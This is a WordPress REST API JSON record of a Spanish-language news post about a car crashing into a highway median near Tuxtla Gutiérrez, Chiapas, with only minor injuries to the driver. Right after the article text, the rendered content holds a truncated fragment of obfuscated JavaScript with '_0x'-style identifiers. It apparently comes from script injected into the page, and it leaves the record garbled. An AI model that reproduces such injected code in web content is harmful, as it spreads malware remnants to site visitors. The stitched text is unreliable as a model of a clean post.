{"id":14377,"date":"2024-02-27T02:10:54","date_gmt":"2024-02-27T02:10:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14377"},"modified":"2024-02-27T02:10:55","modified_gmt":"2024-02-27T02:10:55","slug":"particular-se-estrella-contra-el-camellon-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14377","title":{"rendered":"Particular se estrella contra el camell\u00f3n central"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"843\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708999771172.jpg\" alt=\"\" class=\"wp-image-14378\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708999771172.jpg 566w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708999771172-201x300.jpg 201w\" sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 26 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un Volkswagen Sed\u00e1n de color gris termin\u00f3 estrell\u00e1ndose contra los tri\u00e1ngulos del camell\u00f3n central ubicado en el tramo Tuxtla-Chiapa de Corzo, a la altura de la Prepa 5, dejando cuantiosos da\u00f1os materiales.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando la unidad se desplazaba de Poniente a Oriente y al ir a exceso de velocidad el conductor perdi\u00f3 el control al ingresar a una curva.Esto ocasion\u00f3 que se estrellara contra el camell\u00f3n central y termin\u00f3 estampado contra los tri\u00e1ngulos de concreto. A pesar de lo aparatoso del accidente, el conductor result\u00f3 con heridas menores. Finalmente la Guardia Nacional, orden\u00f3 el levantamiento de la unidad y el traslado a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 26 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un Volkswagen Sed\u00e1n de color gris termin\u00f3 estrell\u00e1ndose contra los tri\u00e1ngulos del camell\u00f3n central ubicado en el tramo Tuxtla-Chiapa de Corzo, a la altura de la Prepa 5, dejando cuantiosos da\u00f1os materiales.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando la unidad se desplazaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14378,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14377","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14377","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14377"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14377\/revisions"}],"predecessor-version":[{"id":14379,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14377\/revisions\/14379"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14378"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14377"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14377"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14377"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}